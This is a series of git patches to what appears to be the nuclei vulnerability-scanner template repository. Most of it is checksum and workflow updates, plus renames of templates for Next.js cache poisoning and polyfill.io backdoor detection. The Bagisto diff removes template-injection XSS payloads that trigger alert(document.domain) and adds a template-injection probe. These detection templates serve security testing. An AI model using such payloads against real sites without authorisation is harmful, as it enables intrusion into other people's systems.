-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:7c8d911712c805c46265145f6c0fd382409c9468 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:33856906eccd385e4757967dfd901c8aef7e4868 +http/technologies/wordpress/plugins/wp-file-manager.yaml:f9dd934a99bf8b9bf25d48287112cacaa7141fee +http/technologies/wordpress/plugins/wp-google-maps.yaml:3401527c9dc6b173d1c32e9e5ac3e9eac75879ba +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65c4068c7d0c57db4395c4c8454fbcdce4b2d191 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:9d7554e521dcf078768fca25a58acca5b986f333 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:05aa780ad3e061d3e1b14337244805e21bbd3585 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:6d689b3b7b3248b9e824ac5fa95e16f74bdf754c +http/technologies/wordpress/plugins/wp-optimize.yaml:c9112037d25cc875705aebc89e6ceb88eda59f77 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:230e533dd9d9c2f60b8d7d9151fbad0d5a3f3868 +http/technologies/wordpress/plugins/wp-reset.yaml:12eda30faf4fbee9ba942634048b2c23ef098262 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ceb0639248074c8ac80d11965216c466df129cf7 +http/technologies/wordpress/plugins/wp-rollback.yaml:7499d1e29d477903830f8f24dd9511f06dbd2033 +http/technologies/wordpress/plugins/wp-seopress.yaml:f2979b1447ff7dc5b3eebc84da502218729a0303 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:6d0924998f97df9b5409db30347da79a4515f256 +http/technologies/wordpress/plugins/wp-smushit.yaml:693d88c65f832df151202cec6b3e0087f50ef296 +http/technologies/wordpress/plugins/wp-statistics.yaml:09002d708e26a3b76211609d7301d96fe850922f +http/technologies/wordpress/plugins/wp-super-cache.yaml:c1872af5b8e038c5253c19a187735d74f6ecf597 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:1fcff3d3b881c0f9dcf700cf7751c5297ee289ce -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:3e13e0b3712e8d5feee7e53cf1332931fce3e678 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:5966753b0c591f2c6da04a70c4f3cf4555a5212b +http/technologies/wordpress/plugins/wpforms-lite.yaml:c6bad38953ab4fe363c6027a9804bf85a9250941 +http/technologies/wordpress/plugins/wps-hide-login.yaml:a94ce48e99f0715117e9e3e610bb1b399099e8b3 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:d9bba13cb7a3ba6131e8bf078ebdfdc98c3b3bea http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:4788db3239545832eba5c869e335e3f19a73dce9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8791,7 +8792,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:fb4239ebca46c2f3a57537e10322c98fb566b2c0 +templates-checksum.txt:4a50ee2f72ed2353b314d7e154bf82fc530634e7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7066518ce4fe83abb0911dd9b0953a5930ceff09 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 27 Jun 2024 09:56:20 +0000 Subject: [PATCH 0665/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 2e40abe13d..35c4ecdd16 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,6 +4,7 @@ on: paths: - '.new-additions' - 'http/cves/2023/CVE-2023-41599.yaml' + - 'http/cves/2023/CVE-2023-52251.yaml' - 'http/cves/2024/CVE-2024-34102.yaml' workflow_dispatch: jobs: From abe36d4e77cd6229f41c52636cad2b0a107524e7 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 27 Jun 2024 09:56:29 +0000 Subject: [PATCH 0666/1841] Auto Generated New Template Addition List [Thu Jun 27 09:56:29 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 3a597d9fa3..cb8bb5ee0f 100644 --- a/.new-additions +++ b/.new-additions @@ -1,3 +1,4 @@ http/cves/2023/CVE-2023-41599.yaml http/cves/2023/CVE-2023-52251.yaml http/cves/2024/CVE-2024-34102.yaml +http/cves/2024/CVE-2024-6028.yaml From 518ef0f995d62519748e3dabbd8e10e593b4495f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 27 Jun 2024 09:56:35 +0000 Subject: [PATCH 0667/1841] Auto Generated Templates Checksum [Thu Jun 27 09:56:35 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 0d34738167..7466e92b67 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3462,6 +3462,7 @@ http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c +http/cves/2024/CVE-2024-6028.yaml:bf84fae80ecbb90ea03cfe0767401bc3da0bcf2a http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -8792,7 +8793,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:4a50ee2f72ed2353b314d7e154bf82fc530634e7 +templates-checksum.txt:b059272b4787d72bcf30f88a4f0d88aac24b25e8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a73db36acbc38d2a1a5325ea932ec21a27acf091 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 27 Jun 2024 09:57:20 +0000 Subject: [PATCH 0668/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 35c4ecdd16..60c93a921f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cves/2023/CVE-2023-41599.yaml' - 'http/cves/2023/CVE-2023-52251.yaml' - 'http/cves/2024/CVE-2024-34102.yaml' + - 'http/cves/2024/CVE-2024-6028.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 405a8faee907bd89ab1d55b4e78bcb1a7c3d1eca Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 27 Jun 2024 09:57:32 +0000 Subject: [PATCH 0669/1841] Auto Template Signing [Thu Jun 27 09:57:32 UTC 2024] :robot: --- http/cves/2023/CVE-2023-52251.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-52251.yaml b/http/cves/2023/CVE-2023-52251.yaml index 7a5f291d61..37361ba814 100644 --- a/http/cves/2023/CVE-2023-52251.yaml +++ b/http/cves/2023/CVE-2023-52251.yaml @@ -69,3 +69,4 @@ http: part: body words: - 'Assigning partitions' +# digest: 4b0a0048304602210090dcbdf999787073e347b90236896f106cca2b7ba465b80d3e338f35b1e50d8802210088f1ccf1eab30ea3f481aec5b0721a90153b605601fe3212d5ac1c7406f9f858:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 24ec1c0b56e7868f0e29654b74dbca6b710a2252 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 27 Jun 2024 15:50:38 +0530 Subject: [PATCH 0670/1841] Update and rename http/cves/2023/CVE-2023-46298.yaml to http/vulnerabilities/next-js-cache-poisoning.yaml --- .../next-js-cache-poisoning.yaml} | 9 +-------- 1 file changed, 1 insertion(+), 8 deletions(-) rename http/{cves/2023/CVE-2023-46298.yaml => vulnerabilities/next-js-cache-poisoning.yaml} (83%) diff --git a/http/cves/2023/CVE-2023-46298.yaml b/http/vulnerabilities/next-js-cache-poisoning.yaml similarity index 83% rename from http/cves/2023/CVE-2023-46298.yaml rename to http/vulnerabilities/next-js-cache-poisoning.yaml index 23f7438850..b9f19c6401 100644 --- a/http/cves/2023/CVE-2023-46298.yaml +++ b/http/vulnerabilities/next-js-cache-poisoning.yaml @@ -1,4 +1,4 @@ -id: CVE-2023-46298 +id: next-js-cache-poisoning info: name: Next.js Cache Poisoning @@ -10,13 +10,6 @@ info: - https://github.com/vercel/next.js/compare/v13.4.20-canary.12...v13.4.20-canary.13 - https://github.com/valentin-panov/nextjs-no-cache-issue - https://zhero-web-sec.github.io/research-and-things/nextjs-and-cache-poisoning-a-quest-for-the-black-hole - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H - cvss-score: 7.5 - cve-id: CVE-2023-46298 - epss-score: 0.00049 - epss-percentile: 0.18429 - cpe: cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* metadata: vendor: vercel product: next.js From c7c7759329263ec28af14f88ea4d51ea757fe26b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 27 Jun 2024 16:02:22 +0530 Subject: [PATCH 0671/1841] minor update --- http/vulnerabilities/other/bagisto-csti.yaml | 33 +++++++++++--------- 1 file changed, 18 insertions(+), 15 deletions(-) diff --git a/http/vulnerabilities/other/bagisto-csti.yaml b/http/vulnerabilities/other/bagisto-csti.yaml index c4d4620ed2..96ae031696 100644 --- a/http/vulnerabilities/other/bagisto-csti.yaml +++ b/http/vulnerabilities/other/bagisto-csti.yaml @@ -9,23 +9,26 @@ info: reference: - https://packetstormsecurity.com/files/179153/Bagisto-2.1.2-Client-Side-Template-Injection.html - https://demo.bagisto.com/ - tags: packetstorm,bagisto,csti + metadata: + fofa-query: "Bagisto" + max-request: 1 + tags: bagisto,csti,packetstorm,ssti http: - - raw: - - | - GET /search?query={{_openBlock.constructor('alert(document.domain)')()}} HTTP/1.1 - Host: {{Hostname}} + - method: GET + path: + - "{{BaseURL}}/bagisto-common/search?query={{228*'98'}}" - - raw: - - | - GET /search?query={{-function(){this.alert(document.domain)}()}} HTTP/1.1 - Host: {{Hostname}} - - stop-at-first-match: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'contains_all(body,"alert(document.domain)","Search results")' - - 'status_code==200' + - type: word + part: body + words: + - "22344" + - "bagisto" condition: and + + - type: word + part: content_type + words: + - "text/html" From fe575e3630c4bcba9e92e59c3e7c0f8f7c1b9f42 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 27 Jun 2024 16:16:00 +0530 Subject: [PATCH 0672/1841] minor update --- http/miscellaneous/polyfill-io.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/http/miscellaneous/polyfill-io.yaml b/http/miscellaneous/polyfill-io.yaml index d326e0bc9e..d0aa0781c2 100644 --- a/http/miscellaneous/polyfill-io.yaml +++ b/http/miscellaneous/polyfill-io.yaml @@ -1,10 +1,11 @@ -id: polyfill-io-detect +id: polyfill-io info: - name: Polyfill.io Detection + name: Polyfill.io - Detection author: kazet severity: low - description: The polyfill.io CDN was suspected to serve malware. + description: | + The polyfill.io CDN was suspected to serve malware. reference: - https://sansec.io/research/polyfill-supply-chain-attack - https://web.archive.org/web/20240229113710/https://github.com/polyfillpolyfill/polyfill-service/issues/2834 @@ -12,7 +13,8 @@ info: metadata: verified: true max-request: 1 - tags: cdn,polyfill.io + shodan-query: html:"polyfill.io" + tags: cdn,polyfill-io,malware http: - method: GET From c026e34a0262b715ea648be0fb2bfc7eae22180f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 27 Jun 2024 16:50:34 +0530 Subject: [PATCH 0673/1841] minor update --- http/cves/2024/CVE-2024-32709.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-32709.yaml b/http/cves/2024/CVE-2024-32709.yaml index f3654aa060..77409c450d 100644 --- a/http/cves/2024/CVE-2024-32709.yaml +++ b/http/cves/2024/CVE-2024-32709.yaml @@ -22,7 +22,7 @@ info: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/wp-recall/" - tags: cve,cve2024,wp-plugin,wp-recall,wordpress + tags: cve,cve2024,wp-plugin,wp-recall,wordpress,wp variables: num: "999999999" From a6635feb733c19af0d984e4caf2c0777de58c823 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 27 Jun 2024 19:00:06 +0530 Subject: [PATCH 0674/1841] Update and rename http/miscellaneous/polyfill-io.yaml to http/vulnerabilities/backdoor/polyfill-backdoor.yaml --- .../backdoor/polyfill-backdoor.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename http/{miscellaneous/polyfill-io.yaml => vulnerabilities/backdoor/polyfill-backdoor.yaml} (92%) diff --git a/http/miscellaneous/polyfill-io.yaml b/http/vulnerabilities/backdoor/polyfill-backdoor.yaml similarity index 92% rename from http/miscellaneous/polyfill-io.yaml rename to http/vulnerabilities/backdoor/polyfill-backdoor.yaml index d0aa0781c2..5aa8e079d0 100644 --- a/http/miscellaneous/polyfill-io.yaml +++ b/http/vulnerabilities/backdoor/polyfill-backdoor.yaml @@ -1,4 +1,4 @@ -id: polyfill-io +id: polyfill-backdoor info: name: Polyfill.io - Detection @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: html:"polyfill.io" - tags: cdn,polyfill-io,malware + tags: cdn,polyfill-io,backdoor,malware http: - method: GET From bd9624fd04ba43f85a01ca0abe08a02ae2039a0f Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 27 Jun 2024 15:13:15 +0000 Subject: [PATCH 0675/1841] Auto Generated New Template Addition List [Thu Jun 27 15:13:14 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index cb8bb5ee0f..637ad12d04 100644 --- a/.new-additions +++ b/.new-additions @@ -2,3 +2,4 @@ http/cves/2023/CVE-2023-41599.yaml http/cves/2023/CVE-2023-52251.yaml http/cves/2024/CVE-2024-34102.yaml http/cves/2024/CVE-2024-6028.yaml +http/vulnerabilities/next-js-cache-poisoning.yaml From cfb7988ae365473a1bdeba11f56916b5a2e2fc77 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 27 Jun 2024 15:13:24 +0000 Subject: [PATCH 0676/1841] Auto Generated Templates Checksum [Thu Jun 27 15:13:24 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7466e92b67..3845b243a8 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3325,7 +3325,7 @@ http/cves/2023/CVE-2023-50968.yaml:ba55dd8cde0223755e58c18a48ae9e7a5407aa62 http/cves/2023/CVE-2023-51449.yaml:f17017eea15c6a52827c4f6f17aec59624bfd30a http/cves/2023/CVE-2023-51467.yaml:ca66217bafda2b96c5c17cad532af4bee418699d http/cves/2023/CVE-2023-52085.yaml:8b9252b4ee0f19700fdbf7777b1865551167c2d8 -http/cves/2023/CVE-2023-52251.yaml:f7c72d3f186332cd3dd13119b51e1aff558b9f8a +http/cves/2023/CVE-2023-52251.yaml:4ca51f181f6db2932a1254864b5544ae056d8c88 http/cves/2023/CVE-2023-5244.yaml:e8676ea3fe8f5fdbf6a62de0894078ce7445b00d http/cves/2023/CVE-2023-5360.yaml:1914270d0878333c4f7605b7686f1c0ad1c009f8 http/cves/2023/CVE-2023-5375.yaml:c2c3a1f499a12f579dd2808bc0f40ed32cef2ecc @@ -7859,6 +7859,7 @@ http/vulnerabilities/netmizer/netmizer-cmd-rce.yaml:6db93ede0157438309939b3a8d7e http/vulnerabilities/netmizer/netmizer-data-listing.yaml:86b5ea2ca47dcb2b20aeff849d263d301b8ccd54 http/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml:850c786f4ac75d6deeefe602a60f94435d7cab07 http/vulnerabilities/netsweeper/netsweeper-rxss.yaml:7ee726ace09d4659b2f3980105a638c57fb0114d +http/vulnerabilities/next-js-cache-poisoning.yaml:1e12cba17ae204be029017a03a35bc5a5c58cc94 http/vulnerabilities/nps/nps-auth-bypass.yaml:90ea2e05d4bf385db0ceee0c92415817731d8a15 http/vulnerabilities/nuxt/nuxt-js-lfi.yaml:d51646219a3065dbf4024260104c2513d9e516d3 http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml:24cfa8b0b2dbd99b1eb75704e139da55e275274f @@ -8793,7 +8794,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b059272b4787d72bcf30f88a4f0d88aac24b25e8 +templates-checksum.txt:74f4c80e77785cd4346d0a9fffd217a065d18ace wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From a8bd9b7f00c92dc8c6beb0463f10844ae638475a Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 27 Jun 2024 15:14:11 +0000 Subject: [PATCH 0677/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 60c93a921f..601f77a35e 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/cves/2023/CVE-2023-52251.yaml' - 'http/cves/2024/CVE-2024-34102.yaml' - 'http/cves/2024/CVE-2024-6028.yaml' + - 'http/vulnerabilities/next-js-cache-poisoning.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 678946be1c02275e0740a703ba815338faf0cd9e Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 27 Jun 2024 15:15:10 +0000 Subject: [PATCH 0678/1841] Auto Template Signing [Thu Jun 27 15:15:09 UTC 2024] :robot: --- http/cves/2024/CVE-2024-6028.yaml | 1 + http/vulnerabilities/next-js-cache-poisoning.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-6028.yaml b/http/cves/2024/CVE-2024-6028.yaml index 2fe98c7865..57993ac1cd 100644 --- a/http/cves/2024/CVE-2024-6028.yaml +++ b/http/cves/2024/CVE-2024-6028.yaml @@ -38,3 +38,4 @@ http: - 'status_code == 200' - 'contains_all(body,"status\":","scoreMessage","displayScore")' condition: and +# digest: 490a00463044022069e5a049ef936612c26a43bcdfe2c8eb29ed3c1ff84d66a531d4215e98ca53a1022056ca1a712669b254a773d248d9f7c9edcfeeea7859b5995eb268a727a9fce0ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/vulnerabilities/next-js-cache-poisoning.yaml b/http/vulnerabilities/next-js-cache-poisoning.yaml index b9f19c6401..75d14edbea 100644 --- a/http/vulnerabilities/next-js-cache-poisoning.yaml +++ b/http/vulnerabilities/next-js-cache-poisoning.yaml @@ -41,3 +41,4 @@ http: - "status_code_1 == 888 && contains(body_1, '/_error')" - "status_code_2 == 888 && contains(body_2, '/_error')" condition: and +# digest: 490a004630440220431ffc17e1380ac71114b178c14ff533c132b114aaf6b6836f0f3da876cf438a022057a9d4cbba84903a9a9d2313346398135d45c8ec9cadbfc650737ffc5e174535:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9a06d65f1b7c41d4242a630d31684a6d4861997f Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 27 Jun 2024 15:50:48 +0000 Subject: [PATCH 0679/1841] Auto Generated New Template Addition List [Thu Jun 27 15:50:48 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 637ad12d04..19510ef08a 100644 --- a/.new-additions +++ b/.new-additions @@ -2,4 +2,5 @@ http/cves/2023/CVE-2023-41599.yaml http/cves/2023/CVE-2023-52251.yaml http/cves/2024/CVE-2024-34102.yaml http/cves/2024/CVE-2024-6028.yaml +http/vulnerabilities/backdoor/polyfill-backdoor.yaml http/vulnerabilities/next-js-cache-poisoning.yaml From 8181b8085e1688714f8970ab03c770eee33e349d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 27 Jun 2024 15:50:58 +0000 Subject: [PATCH 0680/1841] Auto Generated Templates Checksum [Thu Jun 27 15:50:58 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3845b243a8..19edbc5081 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3462,7 +3462,7 @@ http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c -http/cves/2024/CVE-2024-6028.yaml:bf84fae80ecbb90ea03cfe0767401bc3da0bcf2a +http/cves/2024/CVE-2024-6028.yaml:5bb353f3acbac441334cb7219e4198515178e991 http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51a649e382978ba730c3 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -7721,6 +7721,7 @@ http/vulnerabilities/backdoor/kevinlab-bems-backdoor.yaml:40fe980d103f1d5051cba7 http/vulnerabilities/backdoor/kevinlab-hems-backdoor.yaml:dbdc2b6a43a93f2c3fa9693bcebc4603d9259cf7 http/vulnerabilities/backdoor/maccmsv10-backdoor.yaml:e763381e735041df29338e57c20d2f6c1f90cec3 http/vulnerabilities/backdoor/php-zerodium-backdoor-rce.yaml:afb4e7906517f78be25199884095f7d6eff8ac70 +http/vulnerabilities/backdoor/polyfill-backdoor.yaml:fe62beb69c44ac9f251a029254e5eb79973a422d http/vulnerabilities/bsphp-info.yaml:46e581c10e555d13d42b306e5ba11288df471949 http/vulnerabilities/chanjet-tplus/chanjet-tplus-rce.yaml:47bcfad01469360b596efc0ee445ea1da8b7ae9e http/vulnerabilities/chanjet-tplus/chanjet-tplus-unauth-passreset.yaml:76ea49402465f15c655f2e5c13c29f6eb50e8849 @@ -7859,7 +7860,7 @@ http/vulnerabilities/netmizer/netmizer-cmd-rce.yaml:6db93ede0157438309939b3a8d7e http/vulnerabilities/netmizer/netmizer-data-listing.yaml:86b5ea2ca47dcb2b20aeff849d263d301b8ccd54 http/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml:850c786f4ac75d6deeefe602a60f94435d7cab07 http/vulnerabilities/netsweeper/netsweeper-rxss.yaml:7ee726ace09d4659b2f3980105a638c57fb0114d -http/vulnerabilities/next-js-cache-poisoning.yaml:1e12cba17ae204be029017a03a35bc5a5c58cc94 +http/vulnerabilities/next-js-cache-poisoning.yaml:e0d43aad92facaed305db447f27dec8dc929465a http/vulnerabilities/nps/nps-auth-bypass.yaml:90ea2e05d4bf385db0ceee0c92415817731d8a15 http/vulnerabilities/nuxt/nuxt-js-lfi.yaml:d51646219a3065dbf4024260104c2513d9e516d3 http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml:24cfa8b0b2dbd99b1eb75704e139da55e275274f @@ -8794,7 +8795,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:74f4c80e77785cd4346d0a9fffd217a065d18ace +templates-checksum.txt:c10a211289173d951325ef89319b982058ed7627 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 6cedede4939a27ec22ac511b173a1f31bfdbd451 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 27 Jun 2024 15:51:42 +0000 Subject: [PATCH 0681/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 601f77a35e..819084256d 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/cves/2023/CVE-2023-52251.yaml' - 'http/cves/2024/CVE-2024-34102.yaml' - 'http/cves/2024/CVE-2024-6028.yaml' + - 'http/vulnerabilities/backdoor/polyfill-backdoor.yaml' - 'http/vulnerabilities/next-js-cache-poisoning.yaml' workflow_dispatch: jobs: From 30e4a30800d7d6121b4cdaabfc498887669bf20e Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 27 Jun 2024 15:52:45 +0000 Subject: [PATCH 0682/1841] Auto Template Signing [Thu Jun 27 15:52:45 UTC 2024] :robot: --- http/vulnerabilities/backdoor/polyfill-backdoor.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/vulnerabilities/backdoor/polyfill-backdoor.yaml b/http/vulnerabilities/backdoor/polyfill-backdoor.yaml index 5aa8e079d0..bc5da88601 100644 --- 